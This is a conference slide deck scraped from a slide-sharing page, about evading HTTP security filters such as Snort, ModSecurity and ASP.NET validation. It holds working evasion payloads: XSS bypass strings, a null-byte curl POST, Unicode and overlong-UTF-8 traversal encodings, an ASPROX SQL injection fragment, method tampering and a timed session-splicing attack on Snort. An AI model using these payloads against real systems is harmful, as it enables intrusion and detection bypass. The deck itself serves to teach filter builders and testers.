Filter Evasion: Houdini on the Wire

Filter Evasion Houdini on the Wire Rob Ragan ( [email_address] ) HP Application Security Center

Overview
Filters
Understanding different kinds of filters
Identify the short comings of signature development
Evasions
Examination of relevant evasion techniques
Focus on HTTP attacks
How to bypass Snort

Some Reasons to Elude a Filter
Money
Spammers
Fun
Porn
Information
Truth seekers
Illegal act
Stealing private data

Security Filters
Used to detect actions that attempt to compromise a resource
Reactions
Allow
Deny
Log
Remove
Usually a black box
Typically use signatures, which are black lists

Why is it important to understand evasion tactics?
Cyber criminals
Using obfuscation
Penetration testers
Need to keep up with cyber criminals latest techniques
Developers (filter creators)
Need to know how to properly build filters
QA
Need to know how to properly test filters

HTTP Filters Are Everywhere Filter Example Intrusion Detection Systems (IDS) Snort Web Application Firewall (WAF) ModSecurity Server Add-on IIS UrlScan Framework ASP.NET Request Validation Browser IE8 XSS Filter Application custom sanitizer See your code

New Filters
Announced 14 October 2008
The DHS is funding new IDS/IPS development
"The OISF was formed primarily to begin the development of this new IDS/IPS engine, but will over time take on new projects and challenges." http://www.openinfosecfoundation.org
Will they learn from history and other’s mistakes?

Filter Responsibility in the OSI Model

Who is responsible for each layer?
Attackers consistently moving up the stack
The Network perimeter is safer than ever
Applications are more exposed than ever
Who creates filters?
Security professionals
Open source community
Corporations
Ultimately developers need to be responsible
Proper knowledge transfer isn’t occurring

In February of 1676 Sir Issac Newton wrote in a letter to Robert Hooke “If I have seen a little further it is by standing on the shoulders of Giants.” implying that while he may have come up with the final idea he was only able to do so because of the work of those that had gone before him.

Whisker's anti-IDS tactics · 1999
Method matching
GET  HEAD
Url encoding
HEX %xx notation
Double slashes
'/'  '//'
Reverse traversal
/dir/blahblah/../
Self-reference directories
/dir/./././././ == /dir/
Premature request ending
Stop at the first HTTP/1.?
Parameter hiding
%3f  ?
HTTP mis-formatting
%20  %09 (TAB)
Long Urls
GET /<random>/../dir/a.cgi
DOS/Win directory syntax
'/'  ''
NULL method processing
GET
Case sensitivity
'abc'  'ABC'
Details @ http://www.wiretrip.net/rfp/txt/whiskerids.html

Playbook – Let the games begin!
How to attack HTTP filters across the stack
Canocalization
Encoding
Method tampering
Poison NULL byte
Whitespace mis-formatting
Case Sensitivity

Canocalization
Process of converting data to the simplest form
Multiple representations
Normalization
Should use simplest form before performing detection

Canocalization
Microsoft Security Bulletin MS05-004
ASP.NET Path Validation Vulnerability
The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability.“
Mozilla: http://www.target.com/secureDirsomefile.aspx
Internet Explorer: http://www.target.com/secureDir%5Csomefile.aspx

Poison NULL Byte
POST Rule Bypass Vulnerability
Vulnerable March 2007
ModSecurity
ASCIIZ
When assigning string data, the assignment will stop if an embedded NULL byte is encountered
str = " ABC " + " " + " 123 ";
str’s value is " ABC "

Bypass WAF
Content-Type: application/x-www-form-urlencoded
POST data starts with unencoded NULL byte
$ echo -e " 00&var=<script>alert(/xss/);</script> " > postdata
$ curl http://localhost/test.php --data-binary @postdata -A HarmlessUserAgent <script>alert(/xss/);</script>

Full-Width/Half-Width Unicode
Bypass HTTP Filters
Vulnerable May 2007
Cisco, 3Com, McAfee, Novell, ISS, CheckPoint, ModSecurity
An evasion not an exploit
Full-width question mark (?) = U+FF1F

Full-Width/Half-Width Unicode Attacks
<?php
$input_var = " xefxbcx9Cscriptxefxbcx9Ealert(document.location)xefxbcx9C/scriptxefxbcx9E ";
header( 'Content-Type: text/html; charset=ISO-8859-1' );
echo iconv( 'UTF-8' , 'ISO-8859-1//TRANSLIT' , $input_var );
?>
Output:
%uff1cscript%uff1Ealert('HAI')%uff1c/script%uff1E
%EF%BC%9Cscript%EF%BC%9Ealert(123)%EF%BC%9C/script%EF%BC%9E

HTTP Method Tampering
Bypass URL Auth
Vulnerable June 2008
Apache 2.2.6/PHP, Tomcat, WebSphere, WebLogic/JSP, ASP.NET
Security mechanism fails to restrict HTTP methods
GET functionality that is not idempotent or will execute with an arbitrary method
Does your HTTP security filter check for the “ROB” method?

HTTP Method Tampering
RFC 2616: The HEAD method is identical to GET except that the server MUST NOT return a message-body in the response
GET requests to /admin/ required to come from a user in the admin role
Expect HEAD,PUT,DELETE to be denied, right?
Make sure the deny list is explicitly defined
Attack: HEAD /delete_user.asp?uid=666 HTTP/1.1

ASP.NET Validate Request

ASP.NET Framework XSS Filter
ASP.NET 2.0 checks for:
&#
< followed by (A-Z) or (a-z) then / or ! or ?
Skip strings that start with “__” e.g. __VIEWSTATE
Attack:
"></XSS/*-*/STYLE=xss:e/**/xpression(alert(123))>

Encoding Attack
Directory Traversal Vulnerability
Vulnerable August 2008
Apache Tomcat
When context.xml or server.xml allows 'allowLinking' and 'URIencoding' as 'UTF-8'
%c0%ae = . (dot)
http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/foo

Evasions in RSnake’s XSS Cheat Sheet
Null Byte
perl -e
'print " <IMG SRC=javascript:alert("XSS")> ";' > out
Case Insensitive
<IMG SRC=JaVaScRiPt:alert('XSS') >
Tab
<IMG SRC=" jav ascript:alert('XSS'); ">
Newline
<IMG SRC=" jav ascript:alert('XSS'); ">

Encoding
RFC 1738
Only alphanumeric and special characters “$-_.+!*'(),” can be included in the URL
Space is not allowed %20 or +
RSnake’s cheat sheet contains 70 unique ways to encode < (Less than)

70 Unique Ways to Encode <
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
<
<
<
<
<
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
x3c
x3C
u003c
u003C
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
<
<
<
<
<
&#x000003C;

Still Partying Like It’s 1999
Method matching
GET  HEAD
Url encoding
HEX %xx notation
Double slashes
'/'  '//'
Reverse traversal
/dir/blahblah/../
Self-reference directories
/dir/./././././ == /dir/
Premature request ending
Stop at the first HTTP/1.?
Parameter hiding
%3f  ?
HTTP mis-formatting
%20  %09 (TAB)
Long Urls
GET /<random>/../dir/a.cgi
DOS/Win directory syntax
'/'  ''
NULL method processing
GET
Case sensitivity
'abc'  'ABC'

ASPROX (SQL Injection) Worm
T-SQL CAST
Converts an expression of one data type to another
HEX and ASCII encode attacks
Poison NULL byte
DECLARE%20@S%20CHAR(4000);SET%20
@S=C %00 AST(0x4445434C4152452040
...
6F72%20AS%20CHAR(4000));EXEC(@S);--

Catastrophic Backtracking
Do you worry about performance when writing a Regex?
Beware of backtracking
Can lead to exponentially more CPU time for each additional input character O( n 2 )
Make sure there is no way to match the same match
Potential to DoS the filter?

Backtracking Example
(x+x+)+y
One or more of the character X
One or more of the character X
One or more of the previous two matches combined
Followed by a single character Y

PHPIDS Regex Smoketest

White lists are good, but…
How many developers or QA engineers know the entire subset of strings they’ll match or miss?
What about signature writers?
Difficult to find a balance between FP and FN
The underlying signature engine can have problems

Regex Libs Can Have Vulnerabilities
Perl-Compatible Regular Expression (PCRE)
Many serious vulnerabilities
CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007- 1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768
Even if you do everything else right, the Regex lib you use might get attacked

Biggest Target: Application Layer
What about the Transport Layer?
99 problems but TCP ain’t 1
Wrong!

Session Splicing
Network level attack
Send parts of the request in different packets
"GET / HTTP/1.0" may be split across multiple packets to be
"GE", "T ", "/", " H", "T", "TP", "/1", ".0"
Not the same as IP fragmentation

IP Fragmentation vs Session Splicing
IP Fragmentations
If the packet is too large for the link layer a router can split it into multiple fragments
Session Splicing
Purposefully delivering the payload over multiple packets to evade detection. Smaller than it needs to be.
IDS Defense
Fragment reassembly
Session reassembly
Send a reset [RST]

State of the Evasion
Does whisker’s session splicing tactic still work on Snort?
Answer: No
Why?

Session Splicing 1999 vs 2009
The current implementation in whisker will result in 1-3 characters in each packet, depending on your system and network speed
1999 2009

Bypass Snort
Pragmatic Session Splicing + Timing Attack
Use the filter’s signatures to split the payload
Vulnerable if the IDS stateful inspection timeout is less than session reassembly of the hosts it protects
Similar to fragmentation attack but instead of at the IP level we move up to the TCP level

Time Splicer
The attack is practical if we split the session on the matches found by the signature we're trying to evade
Attack:
GET /index.php?param=<script>alert(123)</script> HTTP/1.1 Host:www.target.com
Signature: Matches on <script>|</script> tags
Know the stateful inspection timeout for the IDS
Recursively find matches and split the attack string, then send each splice in a new packet with time delay between each packet

Snort Preprocessors
HTTP Inspect + Stream4
Stateful inspection
Default timeout is 30 seconds
# stream4: stateful inspection/stream reassembly for Snort
#------------------------------------------------------------ # Use in concert with the -z [all|est] command line switch to defeat # stick/snot against TCP rules. Also performs full TCP stream # reassembly, stateful inspection of TCP streams, etc. Can statefully # detect various portscan types, fingerprinting, ECN, etc.
# stateful inspection directive
# no arguments loads the defaults ( timeout 30 , memcap 8388608)

POST /rootlogin.asp HTTP/1.1
Host: zero.spidynamics.com
Keep-Alive: 300
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
txtPassPhrase=&txtName=%3Cs
… WAIT 30s…
cript%3Ealert%283%29%3C%2F
… WAIT 30s…
script%3E&txtHidden=This+was+hidden+from+the+user

Default Session Timeouts
What can you do?
Fingerprint for the Server and Application technology
Fingerprint an IDS
Server Type Timeout Apache/PHP 10 minutes IIS 5.0/ASP 15 minutes IIS 6.0/ASP.NET 20 minutes IIS 7.0/ASP.NET 20 minutes

DEMO
Time Splicer

Questions?

Rob Ragan ( [email_address] )
Check out the HP Security Laboratory on the Blogosphere
http://www.communities.hp.com/securitysoftware/blogs/spilabs/default.aspx

http://www.slideshare.net	23
https://twitter.com	8
http://www.arcanesecurity.net	2
https://si0.twimg.com	1
http://www.linkedin.com	1
http://tweetedtimes.com	1

Filter Evasion: Houdini on the Wire

by rob.ragan

Accessibility

Categories

Upload Details

Usage Rights

6 Embeds 36

Statistics